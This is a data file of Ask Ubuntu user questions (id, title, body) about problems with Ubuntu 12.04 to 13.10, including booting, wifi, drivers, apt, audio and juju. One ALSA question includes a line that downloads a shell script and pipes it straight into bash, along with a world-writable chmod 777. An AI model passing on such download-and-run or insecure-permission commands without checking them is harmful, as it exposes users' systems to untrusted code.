364629	ubuntu ui unresponsive but can ssh in , how do i log out the remote over ssh ?	i want to log out the user session of a remote ubuntu 12.04 x64 ( laptop ) by ssh'ing and running a command . i know i can reboot with a simple sudo reboot but do n't want to if i can help it , i 'd rather just log out and back in . gnome-session-quit fails with an error that it ca n't find the display , and gnome-session-quit display=:0.0 also fails with the error : > gnome-session-quit display=:0.0 ** ( gnome-session-quit:20214 ) : warning ** : command line `dbus-launch -- autolaunch=429980f04422a721b1ae90a50000000d -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : autolaunch error : x11 initialization failed.\n ** ( gnome-session-quit:20214 ) : warning ** : unable to start : can not open display : only other thread i could find similar to this does n't have any more answers than what i 've tried . anyone know the way to do this ?
364631	gnome-do 's 'run ' is not working	i have gnome-do installed , and would like to use it to execute files that are n't necessarily in the application menu . typing the command produces a 'run ' context , however when i press enter the command is n't run . normal application work fine . i do not currently have unity installed and am instead using openbox as my window manager , is this the problem ?
364632	nvidia drivers seem to ignore customized xorg.conf in 13.10 ? how to configure ?	i just upgraded from 13.04 to 13.10 and now i 'm having a problem with the nvidia x server settings : the changes i make do n't stay saved after i restart the x server . i checked the xorg.conf ( /etc/x11/xorg.conf ) and it 's ok but i think it 's not being used . did they move the xorg.conf file ?
364635	acquire : :http : :proxy for only specified repositories	is there a way to use acquire : :http : :proxy for some repositories ? i 'm in a network that has a proxy server . so everybody has to update /etc/apt/apt.conf adding the lines like acquire : :http : :proxy `` http : //yourproxyaddress : proxyport '' ; acquire : :https : :proxy `` http : //yourproxyaddress : proxyport '' ; acquire : :ftp : :proxy `` http : //yourproxyaddress : proxyport '' ; acquire : :socks : :proxy `` http : //yourproxyaddress : proxyport '' ; everything working ok with that . but now we have a lot of ubuntu machines and i want to do a local ubuntu mirror . so we should erase those proxy lines ... . except for external repositories . so , how do i configure something like that ? in rh based distros you can have a global proxy setting for yum and then use individual proxy settings for each repository . but did n't found something similar un ubuntu .
364636	network configuration in ubuntu 12.10	my windows 7 settings is below and its working properly . ip address 192.168.46.31 subnet mask 255.255.255.0 default gateway 192.168.46.1 preferred dns server 10.230.253.253 alternet dns server 203.147.88.2 but in ubuntu 12.10 i change only to file to make this . 1 is in /etc/network/interfaces like below # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) # auto lo # iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.46.31 netmask 255.255.255.0 # network 192.168.46.0 # broadcast 192.168.46.255 gateway 192.168.46.1 and another file is /etc/resolv.conf like # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 10.230.253.253 nameserver 203.147.88.2 but its not connecting . when i click to the `` connection information '' its showing `` no valid connection information found '' and when im pinging to dns its showing like that $ ping 10.230.253.253 ping 10.230.253.253 ( 10.230.253.253 ) 56 ( 84 ) bytes of data . from 192.168.46.31 icmp_seq=1 destination host unreachable am i doing something wrong ?
364637	pxe server 12.04 install will not use nfs export and always asks for cdrom	we are attempting to install server 12.04 through pxe using nfs . we are successfully at the pxe portion but every time it goes to install , we are prompted for the cdrom . further , doing an ip a at this point in a console yields zero network config , as well as loopback completely down . we are putting the preseed file in the initrd.gz file that pxe picks up . if we insert the cdrom source and press continue , the install completes to our satisfaction using the preseed . we would really just like to export the install files through nfs and not have to use a cdrom at all . any help would be greatly appreciated . darrain
364640	login loop and missing sidebar - ubuntu 13.04	i am having issues with ubuntu . i tried to upgrade to 13.04 . i get stuck in a login loop , but i am able to login using ctrl+ alt+f3 . after that , i have to use a short-cut to open the terminal and enter a couple of commands that i found on this site to make the sidebar appear . it is very cumbersome to have to do this every time i start up ubuntu . is there a way to permanently fix these problems ? ? it 's driving me crazy .
364645	us keyboard in 13.10	my keyboard keeps reverting to us layout , even though i 've deleted it and there 's only uk keyboard in settings . this has only happened since saucy salamander . has any body got any advice ? it 's a dell latitude xt3 .
364649	ubuntu wo n't boot correctly on windows 8	i am new to ubuntu and i installed ubuntu so that i can develop more easily then what windows can give me . i am a java/python developer and i thought ubuntu would be pretty cool to have . i have ubuntu installed on my windows 7 laptop but i am still trying to install it on my windows 8 desktop . i do n't have a disk or usb so i installed it online with wubi . my windows 8 desktop still boots correctly but whenever i try to boot ubuntu it says `` trouble booting windows ... '' and then at the bottom it says `` c : \ubuntu\winboot\wubildr '' i think this may be the file causing troubles . i do have a partition that also has this same file . i do n't want to play around with the partition too much and i would like to find an easy fix . computer specs : windows 8 amd e1-1200 apu with radeon ( tm ) hd graphics 1.40 ghz 4.00 gb 64 bit operating system please help if you can thanks ! -donovan
364651	hdmi sound no longer works after updating from 13.04 to 13.10	in 13.04 hdmi sound never worked until i did the following.. sudo gedit /etc/default/grub edit the line : grub_cmdline_linux= '' '' to grub_cmdline_linux= '' radeon.audio=1 '' run : sudo update-grub restart the system . since upgrading to 13.10 the sound is distorted -- squeaky and seems to be in super fast forward . any ideas on how to fix my hdmi sound ?
364652	keyboard does n't work ( 13.04 )	i am trying to install ubuntu from usb , i can use my mouse properly but i ca n't use my k8100 gigabyte keyboard . so i ca n't enter my wifi pass for installing most things , i ca n't make a user/password to actually use it . any help ? i hear this is a common problem installing to a second spare drive it 's driving me nuts - i tried to set it to ibus but it does nothing . - using usb 2.0 instead of 3.0 so in short , ca n't install or type anything due to keyboard problems .
364654	randomly losing connection but still in lan	at work i am using ubuntu 12.04 on my laptop . throughout the day i randomly lose connection to the internet , but i am still in the wlan . like , when i try to connect to google it will timeout and not do anything . then after about 30 seconds i will be able to connect to google again . does anyone have an idea as to why this may be happening ? there is a coffee shop next door and i can connect to it and surf the internet all day without having any issues . is it possible that someone is de-authenticating me ? in this case , would n't i also lose connection to the wlan ? is it possible to use wireshark to see is this is happening ? kindest regards ,
364656	fn keys stopped working after update on ubuntu 12.04	hi i just installed ubuntu 12.04 on my asus s550c but after i applied the updates from ubuntu itself my fn keys doesnt work anymore . can anybody tell me how to get them working again so i can use my brightness and volume keys again thanks , lars
364658	which is the default input method in application in ubuntu gnome 13.10 ?	ok , this more than a question is a plea to explain this thing ... i was trying to answer another question and i got tangled in a mess . disclaimer : i am an old-time unix/linux user , maybe the technology has overtaken me ... i have a standard 13.10 installation with two input method : normal us and us with international dead-key ( this last one is the default - i normally write in spanish , italian , and english , often mixed ) . i have n't selected any input method , so i 'm using the default input method ... which i 'm at a loss to understand which is . so . i create the file .xcompose with the following content ( do n't ask ) : include `` % l '' < dead_acute > < z > : `` å '' aring < dead_acute > < z > : `` å '' aring and restart the server . now xterm , xjed , kile let me write the angstrom unit `` å '' with the dead accent and then z , while gedit , gnome-terminal still give `` ź '' . i ( think i ) know how to modify the behavior via gtk_im_module ( and co. ) environment variables , but my question is oriented to trying to understand which is the default configuration -- - what and where i have to change to have a consistent behavior across all applications . i know , another question that will earn me another tumbleweed badge ...
364660	ubuntu 13.10 and windows 7 - ca n't get back to windows	i installed ubuntu 13.10 on a laptop already running windows 7 . at startup i expected to be able see the option allowing to me to go to either of the two . however i just go straight to ubuntu . i did the installation by downloading to a usb and working from there . i 'm not sure where to go from here ? how do i manage to get windows 7 to startup ? mike
364661	missing bluetooth indicator	i upgraded from raring to saucy , and now my bluetooth is giving me problems . first , even though i have a bluetooth inbuilt in my laptop , which i prefer to keep off unless i am using it , there is no greyed out bluetooth icon in the notification area . this was present in quantal , but was missing in raring too . i was hoping to get this fixed in saucy . seems otherwise . secondly , and more importantly , in saucy when i am turning on my bluetooth , it immediately ( or within seconds ) turns off automatically , without giving me any time to even make the device visible .
364662	wireless disabled and airplane mode enabled after new ubuntu installation	after setting up my old amilo a1630 with the latest ubuntu , i discovered a severe problem with my internal wireless . i ca n't unblock the hard block any more and the airplane mode is always on . rfkill does n't make any difference . the physical button for wireless is on ( led on ) and it should n't block ... rfkill list gives me : soft blocked : no hard blocked : yes there 's no chance to make any changes in my bios , as the wireless is n't listed there . i really do n't know what else to try any more ... hope anyone of you has a solution for me ! thanks miri
364664	how do i get the wireless card on a lenovo s205 working ?	i tried to install 12.04 , 13.04 , and now 13.10 on the machine and followed all the instructions that made sense that i could find and still have not gotten wifi to work . it keeps it hard blocked for some reason , not sure why and not sure anyone out there either has figured it out because i would have found it on google . when i boot from the formatted usb drive , i have wifi and everything working , why does n't work after the usb drive is removed ? what driver is the usb/wubi or whatever using so that i can install it and have things working ? i could have used wubi and installed ubuntu like that , but i want to make this machine a fully dedicated ubuntu machine . the laptop is a lenovo s205 in case anyone can help . i really would like to use 12.04 or higher , i do n't want to downgrade to an older version of ubuntu if at all possible .
364665	standar users and wifi connection	i just canâ´t find the way to make that the system doesnâ´t ask for admin pass when an standard users want to change their wifi connection .
364677	network/ internet nonnection notifier in kde workspace tray	after upgrading to 13.10 , the default network connection notifier in 13.04 in tray is disappeared . i installed kde-full , it is still disappeared . how can i fix this ?
364680	error : unknown filesystem grub rescue help	i 'm trying to install ubuntu on my harddisk which does n't contain any operating system , mbr or grub . it has 3 partitions , 1st includes my data on ntfs file system , second is linux swap now , and third ext4 filesystem . of course i do n't want to lose my data on the ntfs partition . anyway , i installed ubuntu on ext4 filesystem , selected sda as device for bootloader ( not sda1,2 or 2 ) . but i got the error error : unknown filesystem grub rescue > i tried ls . it gives ( hd0 ) , ( hd , msdos1 ) , ( hd0 , msdos2 ) and ( hd0 , msdos3 ) . then i tried ls ( hd0 ) / , ls ( hd0,1 ) / , ls ( hd0 , msdos2 ) / , ls ( hd0 , msdos3 ) / to find the linux filesystem to boot . but i was unsuccessful . it all gave me unknown filesystem error . am i missing something ?
364681	updated 13.04 to 13.10 to bet vlc 2.1.0 but i 'm stuck on 2.0.9	i updated 13.04 to 13.10 only to get vlc 2.1.0 but now when i do this ... sudo add-apt-repository ppa : videolan/stable-daily sudo apt-get update sudo apt-get install vlc it still wo n't update to 2.1.0 . any ideas ?
364682	12.04 - how to install alsa 1.0.27 , to resolve dell sound card microphone echo issue to local speaker ?	problem : microphone in or line in microphone audio is instantly captured and sinked to the local speaker , cause horrible echo problem about my system : ( no pulseaudio used ( cause its always crash and unstable for my system/hardware , so auto killed and never used ) i have alsa 1.0.25 version running in ubuntu 12.04 / 64-bit , with random kernel installed : kernel 3.5.0-17-generic kernel 3.8.x kernel 3.11.x but the echo problem is not resolved after trying all kernel . so , last option left now is to use alsa 1.0.27 to see if that solves the problem . is there any away to use alsa 1.0.27 from any ppa to install in the ubuntu 12.04 ? ( without making it from source , to avoid breaking other packages and dependencies ) edit : wget http : //www.alsa-project.org/alsa-info.sh -o alsa-info.sh & & bash alsa-info.sh # after making settings $ chmod -r 777 /var/lib/alsa/asound.state # to enable read/write access $ alsactl store # on every reboot $ alsactl restore
364683	how to create a bootable usb on mac to install ubuntu into a formatted pc ?	hi i have a working macbook pro and a crashed windows 7 pc . i was running ubuntu on my pc but after a recurrent issue now i ca n't boot either os . i would like to install only ubuntu to my pc and will make windows 7 history for good . but i am a bit puzzled with cretatinf bootable usb options on the website . if i create a bootable usb on my mac following the instructions for mac os , would it boot in a pc ?
364686	ardour wont start jack problem	i downloaded ardour yesterday , it worked , edited an audio file done . come back today it wont start i get this : ardour could not start jack there are several possible reasons : 1 ) you requested audio parameters that are not supported.. 2 ) jack is running as another user . please consider the possibilities , and perhaps try different parameters . so i try and look at qjackctl to see what happening there . when i try to start jack i get d-bus : jack server could not be started . then could not connect to jack server as client . - overall operation failed . - unable to connect to server . please check the messages window for more info . and this is the message box in jack . 15:22:12.927 patchbay deactivated . 15:22:12.927 statistics reset . 15:22:12.944 alsa connection change . 15:22:12.951 d-bus : service is available ( org.jackaudio.service aka jackdbus ) . can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started 15:22:12.959 alsa connection graph change . 15:22:45.850 alsa connection graph change . 15:22:46.021 alsa connection change . 15:22:56.492 alsa connection graph change . 15:22:56.624 alsa connection change . 15:23:42.340 d-bus : jack server could not be started . sorry can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started wed oct 23 15:23:42 2013 : starting jack server ... wed oct 23 15:23:42 2013 : jack server starting in realtime mode with priority 10 wed oct 23 15:23:42 2013 : error : can not lock down 82274202 byte memory area ( can not allocate memory ) wed oct 23 15:23:42 2013 : acquired audio card audio0 wed oct 23 15:23:42 2013 : creating alsa driver ... hw:0|hw:0|1024|2|44100|0|0|nomon|swmeter|-|32bit wed oct 23 15:23:42 2013 : error : attention : the playback device `` hw:0 '' is already in use . the following applications are using your soundcard ( s ) so you should check them and stop them as necessary before trying to start jack again : pulseaudio ( process id 2553 ) wed oct 23 15:23:42 2013 : error : can not initialize driver wed oct 23 15:23:42 2013 : error : jackserver : :open failed with -1 wed oct 23 15:23:42 2013 : error : failed to open server wed oct 23 15:23:43 2013 : saving settings to `` /home/drew/.config/jack/conf.xml '' ... 15:26:41.669 could not connect to jack server as client . - overall operation failed . - unable to connect to server . please check the messages window for more info . can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started 15:26:49.006 d-bus : jack server could not be started . sorry wed oct 23 15:26:48 2013 : starting jack server ... wed oct 23 15:26:48 2013 : jack server starting in non-realtime mode wed oct 23 15:26:48 2013 : error : can not lock down 82274202 byte memory area ( can not allocate memory ) can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started wed oct 23 15:26:48 2013 : error : can not register object path `` /org/freedesktop/reservedevice1/audio0 '' : a handler is already registered for /org/freedesktop/reservedevice1/audio0 wed oct 23 15:26:48 2013 : error : failed to acquire device name : audio0 error : a handler is already registered for /org/freedesktop/reservedevice1/audio0 wed oct 23 15:26:48 2013 : error : audio device hw:0 can not be acquired ... wed oct 23 15:26:48 2013 : error : can not initialize driver wed oct 23 15:26:48 2013 : error : jackserver : :open failed with -1 wed oct 23 15:26:48 2013 : error : failed to open server wed oct 23 15:26:50 2013 : saving settings to `` /home/drew/.config/jack/conf.xml '' ... 15:26:52.441 could not connect to jack server as client . - overall operation failed . - unable to connect to server . please check the messages window for more info . can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started 15:26:55.997 d-bus : jack server could not be started . sorry wed oct 23 15:26:55 2013 : starting jack server ... wed oct 23 15:26:55 2013 : jack server starting in non-realtime mode wed oct 23 15:26:55 2013 : error : can not lock down 82274202 byte memory area ( can not allocate memory ) can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started wed oct 23 15:26:55 2013 : error : can not register object path `` /org/freedesktop/reservedevice1/audio0 '' : a handler is already registered for /org/freedesktop/reservedevice1/audio0 wed oct 23 15:26:55 2013 : error : failed to acquire device name : audio0 error : a handler is already registered for /org/freedesktop/reservedevice1/audio0 wed oct 23 15:26:55 2013 : error : audio device hw:0 can not be acquired ... wed oct 23 15:26:55 2013 : error : can not initialize driver wed oct 23 15:26:55 2013 : error : jackserver : :open failed with -1 wed oct 23 15:26:55 2013 : error : failed to open server wed oct 23 15:26:57 2013 : saving settings to `` /home/drew/.config/jack/conf.xml '' ... 15:26:59.054 could not connect to jack server as client . - overall operation failed . - unable to connect to server . please check the messages window for more info . can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started 15:29:24.624 alsa connection graph change . 15:29:24.641 alsa connection change . 15:33:11.760 d-bus : jack server could not be started . sorry can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started wed oct 23 15:33:11 2013 : starting jack server ... wed oct 23 15:33:11 2013 : jack server starting in non-realtime mode wed oct 23 15:33:11 2013 : error : can not lock down 82274202 byte memory area ( can not allocate memory ) wed oct 23 15:33:11 2013 : error : can not register object path `` /org/freedesktop/reservedevice1/audio0 '' : a handler is already registered for /org/freedesktop/reservedevice1/audio0 wed oct 23 15:33:11 2013 : error : failed to acquire device name : audio0 error : a handler is already registered for /org/freedesktop/reservedevice1/audio0 wed oct 23 15:33:11 2013 : error : audio device hw:0 can not be acquired ... wed oct 23 15:33:11 2013 : error : can not initialize driver wed oct 23 15:33:11 2013 : error : jackserver : :open failed with -1 wed oct 23 15:33:11 2013 : error : failed to open server wed oct 23 15:33:12 2013 : saving settings to `` /home/drew/.config/jack/conf.xml '' ... 15:34:09.439 could not connect to jack server as client . - overall operation failed . - unable to connect to server . please check the messages window for more info . can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started
364688	mac hdd is encrypted	i have the hard drive from a powermac g5 , which was my old computer before it died and i upgraded to ubuntu studio . the hard drive its self still works well , but on ubuntu i ca n't access most of the files . i plugged it into my macbook air and changed some of the perms on some of the folders as a test . this worked for a few , but for others , i was getting the same message can not access folder . access denied . i would like to use this as an external hdd ( i have a case and everything ) , but it 's kind of pointless if i ca n't access the folders that i want . after looking around for a couple of hours , i could n't find anything that actually gave me an answer . i would like to know if : anybody else has come upon this problem , if so , have you found a solution ? and , what is it ?
364689	`` e : the method driver /usr/lib/apt/methods/htp could not be found . '' after removing the lamp task	so , i tried uninstalling the lamp stack i had following the ubuntu documentation for it . i also manually removed dbconfig-common . now , i 'm unable to run apt-get update . when i do , i get the error message : e : the method driver /usr/lib/apt/methods/htp could not be found . after some digging , i 've discovered that i no longer even have an /etc/apt/sources.list file . also , i 've received an error , when trying to run : sudo tasksel install lamp-server that aptitude can not be found . does anyone have an idea of what i can do ? i 'm not able to find any documentation online that works - all the documentation out there is dated and no longer ( or will not ) work with 13.04 . i followed this link previously prior to posting my question and it did not work for me : how do i fix a `` e : the method driver /usr/lib/apt/methods/http could not be found . '' error ? when i run cd /usr/lib/apt/methods and then run ls and it shows that http and https are files that exist within that directory . not sure why the script that is run when updating looks for the driver in /methods/htp
364690	ca n't add any ppa 's after reinstalling ubuntu 13.10	i ca n't add any ppa 's at all after reinstalling ubuntu 13.10 . here is what it says : michael @ mikeskomputer : ~ $ sudo add-apt-repository ppa : atareao/atareao can not add ppa : 'ppa : atareao/atareao ' . please check that the ppa name or format is correct . this repository is working as far as i know . the problem is that i ca n't add any new repositories . even if i can use the software center , i ca n't have my system with the add-apt-repository command broken .
364691	i need to get past my permissions to recover data	due to some mishaps , i am unable to boot into kubuntu at all . however , my data is still on the hard drive . i managed to get one of the other two computers to which i have access to read the disk by booting into a livecd session of kubuntu . the only storage medium to which i have access is a 30 gb data stick . here 's where the trouble starts : in music alone , i have to back up about 60 gb . obviously this is going to have to be split into chunks and moved over to the second spare pc until i can reinstall kubuntu on my laptop . all of the data that needs backed up is behind a permissions wall , so while i can view it , i ca n't interact with it directly . i know copying and moving through the terminal can get around this with sudo cp or sudo mv , but is there a way to first compress multiple folders in a single archive , then move it ? ( while we 're on the subject , what compression method would be best for large volumes of music in mp3 , wav , and ogg format ? )
364697	i can not lock screen in 13.10	after upgrade to 13.10 from 13.04 i can not lock screen . when i try to lock screen from the panel , nothing happen . thanks.-
364698	13.04 ringtail usb installation overwrote my username	i had to use an .iso usb to upgrade from 12.10 to 13.04 ringtail . great results , except the usb stick install app asked me to provide an identity so i provided the same one i used for 12.10 . unfortunately it overwrote my other identity with a fresh one , so now i have no ownership of all my previous profiles , etc . a dumb mistake , but is there a way to take ownership of my previous user identity and merge it with the current ?
364699	problem with booting ubuntu 12.04 lts after instaling it alonside windows 8.1 .	i installed ubuntu alongside windows 8.1 over an usb drive on my laptop . at first i had problems with the boot selection menu and i fixed it with easybcd . now when i boot up my laptop it takes me to chose windows 8.1 or ubuntu . i press ubuntu and it takes me to the grub menu . now i chose there ubuntu 12.04 and it starts to boot for few seconds and then my screen goes black and nothing happens . a few seconds later i hear like short error noise and still nothing happens .
364700	altrnative to kde 's `` force font dpi '' functionality	i am currently using a non-kde system ( lubuntu ) and am trying to find a way to force dpi to a specific value . what file do i need to edit to force dpi to 96 ? what is the proper code ? my ubuntu system oddly enough comes without any xorg.conf file . thanks !
364708	installation problem 12.04 lts	i installed ubuntu 12.04 lts from cd . seemed to be ok , but i was not able to move the cursor . found a fix in askubuntu . wrote in terminal : sudo modprobe -r psmouse . the computer then asks for password , but it will not accept the password ! what to do now ? it is disapointing to bye a cd containing an error known for some time ! at least there should have been a paper discribing the fix .
364711	hp envy fn keys issue	so i recently installed the nvidia-prime drivers on my hp envy 17 running ubuntu 13.10 and because of this it seems that my volume fn keys do n't work anymore . i have tried uninstalling the nvidia drivers and then the keys work perfectly fine , so i 'm assuming its a problem with that . i 've been looking around for a long time now , but have n't found any fixes for my problem . any help would be very appreciated .
364714	juju deploy of charm ( mysql ) in maas provider failing after successful bootstrap . juju status stuck in `` pending '' state	i have setup a maas environment and using juju to deploy services . i followed the simple juju tutorial of trying to deploy mysql and wordpress . the bootstrap node has come up fine without any errors . however , on deploying mysql ( juju deploy -- repository= < path > local : raring/mysql ( got the mysql and wordpress charms using bzr ) ) , the maas node did the ubuntu installation over the network using pxe boot ( all of that seems to be working correctly ) . however , the charm does n't seem to come-up . juju status is stuck in pending state and the logs ( of the machine-1 , which is to deploy the charm ) seem to suggest that the exec of the start -- system jujud-unit-mysql-0 has failed due to unable to connect to the sytem bus ( /var/run/dbus/system_bus_socket ) . there are other posts on this forum indicating that this may be caused by issues with /var/run and /run ( but that might have been fixed in raring series ) , and also possibly use of sudo command may be needed . obviously this is something that is being spawned off from within juju and i have no control ( to use sudo or not to execute that command to deploy the charm ) . can someone please help in debugging this issue . thanks in advance . juju status environment : maas machines : `` 0 '' : agent-state : started agent-version : 1.16.0 dns-name : honeybee-2.maascluster instance-id : /maas/api/1.0/nodes/node-0abcb8ec-378b-11e3-b1d0-00155d964216/ series : raring `` 1 '' : agent-state : started agent-version : 1.16.0 dns-name : honeybee-3.maascluster instance-id : /maas/api/1.0/nodes/node-58eddf9c-379e-11e3-b1d0-00155d964216/ series : raring services : mysql : charm : local : raring/mysql-309 exposed : false relations : cluster : - mysql units : mysql/0 : agent-state : pending machine : `` 1 '' public-address : honeybee-3.maascluster # ssh ubuntu @ honeybee-3.maascluster # less /var/log/juju/machine-1.log 2013-10-23 20:32:05 info juju.worker.deployer deployer.go:146 deploying unit `` mysql/0 '' 2013-10-23 20:32:05 info juju.worker.machiner machiner.go:52 `` machine-1 '' started 2013-10-23 20:32:05 info juju.worker.upgrader upgrader.go:134 desired tool version : 1.16.0 2013-10-23 20:32:05 debug juju.worker.deployer simple.go:91 state addresses : [ `` honeybee-2.maascluster:37017 '' ] 2013-10-23 20:32:05 debug juju.worker.deployer simple.go:96 api addresses : [ `` honeybee-2.maascluster:17070 '' ] 2013-10-23 20:32:06 warning juju.worker.deployer simple.go:244 installer : can not remove `` /var/lib/juju/agents/unit-mysql-0 '' : remove /var/lib/juju/agents/unit-mysql-0 : directory not empty 2013-10-23 20:32:06 error juju runner.go:211 worker : exited `` deployer '' : exec [ `` start '' `` -- system '' `` jujud-unit-mysql-0 '' ] : exit status 1 ( start : unable to connect to system bus : failed to connect to socket /var/run/dbus/system_bus_socket : no such file or directory ) 2013-10-23 20:32:06 info juju runner.go:245 worker : restarting `` deployer '' in 3s 2013-10-23 20:32:09 info juju runner.go:253 worker : start `` deployer '' 2013-10-23 20:32:09 info juju.worker.deployer deployer.go:106 checking unit `` mysql/0 '' 2013-10-23 20:32:09 info juju.worker.deployer deployer.go:106 checking unit `` mysql/0 '' ( end ) # dpkg -l dbus ||/ name version architecture description +++-==============-============-============-================================= ii dbus 1.6.8-1ubunt amd64 simple interprocess messaging sys
364715	ubunto not showing gui	i did install ubuntu 13.10 on my old pc . everything went fine except for when i login into my account there is no menubar , no icon bar , just only my wallpaper . i can do thing like creating a new folder and even access settings ( so i did setup my internet connection ) and i can acces the log thingy ( forget how to call it ) by pressing ctrl+alt+f1 , but i ca n't do anything else with it . i had this same issue also when i did try to install ubuntu in the past ( that was version 12.idontknowanymore ) . i did spend this whole evening searing how to fix this on the internet , but without any succes . my computer is n't really super , i think it has about 1gb ram , and the original os is windows xp ( i did pick the 32bit version of ubuntu ) . does anyone knows how i can fix this problem and start using ubuntu ? thanks sincerely , ingo
364717	two wifi icons in panel	i have the exact problem in 13.10 as this user why are there two wifi indicators in the panel ? . here are some screenshots : here are some screenshots from another user : http : //ubuntuforums.org/showthread.php ? t=2183020 & p=12825563 ifconfig and iwconfig outputs $ ifconfig lo link encap : local loopback inet addr : xxxxxx mask : xxxxxxx inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:2243 errors:0 dropped:0 overruns:0 frame:0 tx packets:2243 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:209889 ( 209.8 kb ) tx bytes:209889 ( 209.8 kb ) wlan0 link encap : ethernet hwaddr xxxxxxxxx inet addr : xxxxxx bcast : xxxxxxxx mask : xxxxxxx inet6 addr : xxxxxxx scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5925 errors:0 dropped:0 overruns:0 frame:0 tx packets:3361 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2951818 ( 2.9 mb ) tx bytes:630579 ( 630.5 kb ) $ iwconfig lo no wireless extensions . wlan0 ieee 802.11abgn essid : '' xxxxx '' mode : managed frequency:2.437 ghz access point : xxxxxxxx bit rate=72.2 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : on link quality=49/70 signal level=-61 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:153 invalid misc:472 missed beacon:0
364719	installing ubuntu 13.10 with dvd	i 'm a windows user thats wants to switch to ubuntu as it is much better imo ( tried install with wubi ( hd could only go up to 32gb ) ) so i decided to do a proper install using a dvd . i burned the dvd as an image as it should be done , following instructions , and when i turned my comp off and back on , it went straight to windows . from what i read , the dvd file should of loaded first allowing for the install . would appreciate any help possible . also my intent is to have dual-boot with both operating systems .
364722	`` invalid command 'order ' '' after deleting /etc/apache2	i 'm having a hell of a time setting up a dev environment for wordpress . i messed everything up a couple weeks ago and this afternoon wanted to start over . i tried to reset apache by uninstalling the package and deleting the /etc/apache2 directory . then i reinstalled apache2 and restored the directory with the command : sudo apt-get install -- reinstall apache2.2-common localhost navigates to the `` it works ! '' page , but apache wo n't restart , which make me nervous . i keep getting this error : syntax error on line 160 of /etc/apache2/apache2.conf : invalid command 'order ' , perhaps misspelled or defined by a module not included in the server configuration action 'configtest ' failed . the apache error log may have more information . ... fail ! any ideas ? i 'm just trying to get up a working lamp set up .
364724	how to make my own splash screen	i 'm trying to make a destro and i need to change the splash screen . i go to /usr/share but there is no images . help ?
364725	windows 7 wo n't boot ? tried boot repair	well i downloaded ubuntu and made it so that the computer is duel boot , and at first ubuntu and windows both worked great , but the next day i tried accessing windows 7 , and it would n't boot . it just goes to the screen where the windows logo comes up and says windows 7 , and then reboot . i tried boot repair and it did n't work , the problem 's still there . so how do i fix it ? ? ps : here 's the link that boot repair gave to me : http : //paste.ubuntu.com/6287090
364727	ubuntu-one - host requires authentication	when i try to log in ubuntu one in saucy always say `` host requires authentication '' . what can i do ?
364732	iptables port forwarding	i want to forward the traffic from 85.25.47.11:9999 ( linux ) to 62.75.130.241:9987 you can see the ip is different . is it possible to forward it in this way
364742	how to keep the open windows in the right workspace while changing/rotating monitor ?	when i plug in/out an external monitor monitor , or i rotate the laptop monitor , the windows/applications open in the several workspaces often mess up , such as in the following figure : how can avoid it ? i work with a laptop plugged to a bigger screen and a lot of windows open , and several times a day i unplug the external monitor to bring the laptop with me , resulting in this issue . the same occours when i put my laptop ( a `` convertible '' thinkpad x220t ) in portrait mode .
364743	why ubuntu 12.04 lts cloud images do n't come with backported kernels ?	why the latest ubuntu 12.04.3 lts cloud images ( http : //uec-images.ubuntu.com/releases/12.04/release ) does not come with the latest kernel , the linux-generic-lts-raring ? any special reason to not ship it to the cloud ? can i just install the linux-generic-lts-raring into my ec2 and/or openstack instances without any problem ? ! i see they work but , i would like to know why it is not shipped by default . thanks ! thiago
364744	laptop will not wake up after closing lid after updating to 13.10	i tried the steps at ubuntu freezes/crash after wake when upgraded to 13.10 . none of them solved my problem . when i close the lid on my laptop , ubuntu goes to sleep just as it always has . however , since the update , it just shows a black screen ( pixels emit leak through light , showing screen to at least have turned on . ) sometimes ( once ) , my desktop will flash before going into the black screen . this is a very annoying bug , and if any more information is needed ( cat insert-config-file-here , etc ) , i am willing to provide
364749	i ca n't connect using ssh or mpd when on wireless network	my 13-04 works as expected when ethernet is connected , but when it 's on wifi , i ca n't reach the machine from other machines on the network . my plan is to use it as a music player from android and windows mpd players . but the stereo i 'm pairing it with does n't have ethernet nearby . i 've seen that there are special instructions for configuring wifi to run automatically on restart , but right now , i ca n't get it to work even when i 'm already signed in and using wifi on the desktop . ssh and mpd work perfectly when ethernet is connected , but fail when wifi is used . the firewall is disabled . other computers on the wifi network are able to talk to each other , so it 's not a problem at the network level . is there some special configuring i need to do to my wifi set up in order to have it accept connections from network peers ?
364751	ubuntu 13.10 boots to terminal ( tty1 ) first ?	when i boot ubuntu on my desktop it first brings me to the tty1 login screen once i login i get the normal graphical login and can login normally . is there any way i can get around this ?
364759	ca n't install steam libc.so.6	error : you are missing the following 32-bit libraries , and steam may not run : libc.so.6 i installed steam from the software center .
364760	searching for the j. r. `` bob '' dobbs screensaver from slackware to install in 13.10	i have seen on older ( ca . 2004 ) rhel systems a screensaver , xlock , with a twisting and morphing picture of j. r. `` bob '' dobbs . an extensive search of screensavers available for ubuntu has not provided revelation . does any subgenius out there know where i may find it for the current lubuntu ver . 13.10 ? thank you kindly . where do i expect to find it ? well , every screensaver app available via synaptic and ubuntu software center has been checked , to no avail . i have also done an extensive search for it via multiple search engines , not merely looking at the first screen in a google search . that 's why i am asking here . how might i import that app from slackware 's repository into lubuntu ?
